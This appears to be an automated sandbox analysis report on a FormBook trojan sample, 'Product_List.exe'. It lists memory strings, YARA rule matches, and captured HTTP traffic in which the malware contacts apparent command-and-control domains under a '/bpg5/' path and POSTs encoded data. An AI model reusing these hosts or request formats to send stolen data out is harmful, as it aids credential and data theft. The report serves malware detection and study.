          Source: Product_List.exe, 00000000.00000003.555688597.00000000056E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comer
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fabricadepack.fun
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fabricadepack.fun/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fabricadepack.fun/bpg5/www.fabricadepack.funJBfKk=_uLb4J-vJhW8
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Product_List.exe, 00000000.00000003.568009950.00000000056E3000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.581333592.00000000056E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comaSe
          Source: Product_List.exe, 00000000.00000003.568009950.00000000056E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrita
          Source: Product_List.exe, 00000000.00000003.568009950.00000000056E3000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.581333592.00000000056E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comwe
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Product_List.exe, 00000000.00000003.554839130.00000000056EC000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Product_List.exe, 00000000.00000003.554839130.00000000056EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnD
          Source: Product_List.exe, 00000000.00000003.554839130.00000000056EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnl-g
          Source: Product_List.exe, 00000000.00000003.554839130.00000000056EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnpl
          Source: Product_List.exe, 00000000.00000003.554839130.00000000056EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnsk
          Source: Product_List.exe, 00000000.00000003.554839130.00000000056EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnto(l
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomarketing.info
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomarketing.info/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomarketing.info/bpg5/www.gomarketing.infoJBfKk=_uLb4J-vJhW8
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.825175140.000000000E086000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.haynicorpon.biz
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.825175140.000000000E086000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.haynicorpon.biz/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizJBfKk=_uLb4J-vJhW8
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com/bpg5/
          Source: cmd.exe, 00000005.00000002.811239362.000000000089A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=pOb1wbOKbC6m5caeF5Aq0gkUNx4nmy
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com/bpg5/www.jhg61.comJBfKk=_uLb4J-vJhW8
          Source: Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Product_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Se
          Source: Product_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/B
          Source: Product_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ae
          Source: Product_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/he
          Source: Product_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: Product_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Me
          Source: Product_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/~e
          Source: Product_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/on
          Source: Product_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t-i
          Source: Product_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/we
          Source: Product_List.exe, 00000000.00000003.563636161.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.563215083.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.563169804.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.563372492.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.563400542.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.564284516.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.564193466.0000000005715000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.563721802.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.564010470.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.563825497.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.564115737.0000000005715000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.563769853.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.563870022.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.563982003.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.563322117.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.564037260.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.564235208.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.563528266.0000000005714000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.563572414.0000000005714000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.musicandgros.com
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.musicandgros.com/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.musicandgros.com/bpg5/www.musicandgros.comJBfKk=_uLb4J-vJhW8
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mysparexrewards.com
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mysparexrewards.com/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comJBfKk=_uLb4J-vJhW8
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com)B
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com/bpg5/www.perkibeans.comJBfKk=_uLb4J-vJhW8
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com/bpg5/www.rt66omm.comJBfKk=_uLb4J-vJhW8
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techwithsun.com
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techwithsun.com/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techwithsun.com/bpg5/www.techwithsun.com
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetowerbells.com
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetowerbells.com/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetowerbells.com/bpg5/www.thetowerbells.comJBfKk=_uLb4J-vJhW8
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vns96.net
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vns96.net/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vns96.net/bpg5/www.vns96.netJBfKk=_uLb4J-vJhW8
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wearecatalyst.app
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wearecatalyst.app/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appJBfKk=_uLb4J-vJhW8
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: -15B7L5MNM.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -15B7L5MNM.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: -15B7L5MNM.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmd.exe, 00000005.00000003.665023503.0000000000945000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -15B7L5MNM.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: cmd.exe, 00000005.00000003.665023503.0000000000945000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: cmd.exe, 00000005.00000003.665023503.0000000000945000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: cmd.exe, 00000005.00000003.665023503.0000000000945000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: cmd.exe, 00000005.00000003.665023503.0000000000945000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: explorer.exe, 00000004.00000002.826129272.00000000164DC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.814741230.0000000003CCC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.antalyabfe.com/bpg5/?8mBWmPn=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3
          Source: cmd.exe, 00000005.00000003.665023503.0000000000945000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.musicandgros.comConnection: closeContent-Length: 1485Cache-Control: no-cacheOrigin: http://www.musicandgros.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.musicandgros.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 6d 42 57 6d 50 6e 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 44 6d 6a 63 53 66 41 63 67 6e 32 66 71 36 44 6c 65 33 4f 74 7a 50 52 32 51 79 54 78 32 6f 72 32 35 62 70 30 43 59 42 35 72 53 5a 46 4e 68 65 6a 31 4a 6f 70 55 7a 30 56 76 6e 31 79 45 32 7a 67 4d 52 69 56 67 59 4c 42 46 53 6c 71 37 28 71 65 77 37 6b 50 6d 5a 52 32 51 35 39 7e 37 62 6f 58 79 62 78 4c 54 35 52 4c 37 72 4c 4d 56 6b 55 39 38 4e 4d 45 59 4a 36 7a 39 50 6f 67 57 38 54 55 50 72 47 70 6b 38 30 72 30 68 35 4e 54 46 4b 53 42 44 65 77 56 70 2d 7a 6b 62 75 34 6d 52 75 48 58 6f 42 61 74 41 6c 30 70 70 4d 50 33 30 42 32 5a 33 45 72 77 57 6d 6d 32 41 39 54 30 41 2d 7e 70 6a 53 55 68 28 4a 58 4c 4a 2d 62 54 4b 57 6a 43 4e 45 4c 78 7e 6b 6a 57 69 6b 45 64 6c 41 72 39 76 67 61 69 41 6e 45 30 59 70 68 45 65 72 58 70 32 6c 58 64 77 35 45 45 4e 53 4e 68 72 31 59 4c 74 6d 73 56 79 37 70 54 6f 59 56 34 37 42 38 67 31 53 45 32 6b 42 6c 4c 37 54 44 79 6b 44 74 4b 46 36 61 44 79 6e 69 6a 66 53 39 38 35 31 43 7a 75 72 70 6b 79 6f 39 39 36 65 76 64 78 79 65 4a 37 58 35 4f 41 53 6a 5f 34 6e 4c 6c 35 45 55 62 63 76 47 32 44 4b 4e 48 7e 43 38 76 35 4f 52 36 74 58 30 42 30 79 63 4b 44 57 6b 4a 41 4c 71 77 50 57 6e 31 67 44 44 65 67 2d 76 53 67 4f 65 55 28 41 4b 67 42 56 4b 48 70 4f 64 5f 38 41 28 4f 56 6c 65 56 41 76 6e 32 33 30 54 4f 30 6c 52 51 6c 37 69 76 37 61 6e 36 35 79 6d 68 77 64 70 72 39 33 51 4e 33 34 32 75 54 39 37 50 50 5f 7e 41 53 33 57 73 4d 57 54 39 55 6c 52 75 6b 58 49 45 6a 4c 7e 57 73 49 68 73 43 51 4f 47 45 54 78 71 6c 44 4f 69 50 79 4c 37 64 32 4d 67 79 43 7a 5a 44 38 4a 39 63 76 68 36 73 65 36 42 74 6f 51 46 44 76 74 57 4b 73 74 74 33 78 39 38 49 58 49 35 59 36 45 51 79 47 72 33 61 65 42 64 41 6d 50 78 74 62 30 70 6c 4a 4d 4b 56 73 71 6c 61 42 75 6c 30 2d 73 47 54 33 79 2d 49 34 67 6c 79 6f 67 75 71 4f 34 54 6d 4f 42 48 66 4f 63 72 46 76 39 68 6d 31 71 30 39 78 4a 67 28 64 35 38 45 67 4d 62 61 37 4a 4f 71 6b 61 6c 74 72 43 42 78 59 42 4a 46 58 32 4d 65 67 4c 70 38 73 31 77 52 4e 28 4e 6c 53 71 44 39 63 6f 79 46 6b 47 33 37 33 55 52 4f 74 46 4d 4d 66 6d 4f 34 38 32 72 4a 76 68 6d 70 56 7e 66 50 71 7a 35 53 78 55 71 56 51 63 63 51 51 56 34 41 54 55 7a 62 62 4b 4a 6e 6b 4a 2d 77 59 7e 6e 68 49 32 2d 56 4b 49 61 50 30 48 4c 46 6b 36 6b 38 5a 48 4d 52 31 28 46 44 4e 38 37 6b 47 71 35 45 52 76 69 78 2d 6c 6d 50 6c 65 45 4c 7a 78 67 58 7a 7a 79 70 6a 43 68 72 46 53 68 49 38 70 30 4f 51 38 34 76 62 31 42 43 64 54 31 57 58 33 51 46 62 73 6a 51 63 4d 73 7a 73 73 4f 70 75 68 61 72 5f 4c 51 5a 44 68 76 50 54 51 75 70 4c 6f 6b 72 39 50 47 6e 58 56 63 65 75 34 48 7e 66 41 52 4f 6c 32 71 6
          Source: unknownDNS traffic detected: queries for: www.berlinhealthweek.com
          Source: C:\Windows\explorer.exeCode function: 4_2_0E0734E2 getaddrinfo,SleepEx,setsockopt,recv,recv,4_2_0E0734E2
          Source: global trafficHTTP traffic detected: GET /bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA== HTTP/1.1Host: www.berlinhealthweek.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?8mBWmPn=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTEx2mn7HsaAaANg==&JBfKk=_uLb4J-vJhW8 HTTP/1.1Host: www.musicandgros.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCPUstET1IBoTg95Q== HTTP/1.1Host: www.gomarketing.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?8mBWmPn=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8XP3QjR+DEcO6R3g==&JBfKk=_uLb4J-vJhW8 HTTP/1.1Host: www.antalyabfe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?8mBWmPn=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&JBfKk=_uLb4J-vJhW8 HTTP/1.1Host: www.rt66omm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Product_List.exe, 00000000.00000002.581850388.0000000000FBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Windows\explorer.exeCode function: 4_2_0E06CE12 OpenClipboard,4_2_0E06CE12

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.Product_List.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Product_List.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.812010845.0000000000C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.810909300.0000000000780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.620980229.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.Product_List.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.Product_List.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.Product_List.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.Product_List.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.812010845.0000000000C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.812010845.0000000000C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.810909300.0000000000780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.810909300.0000000000780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.620980229.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.620980229.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: Product_List.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.Product_List.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
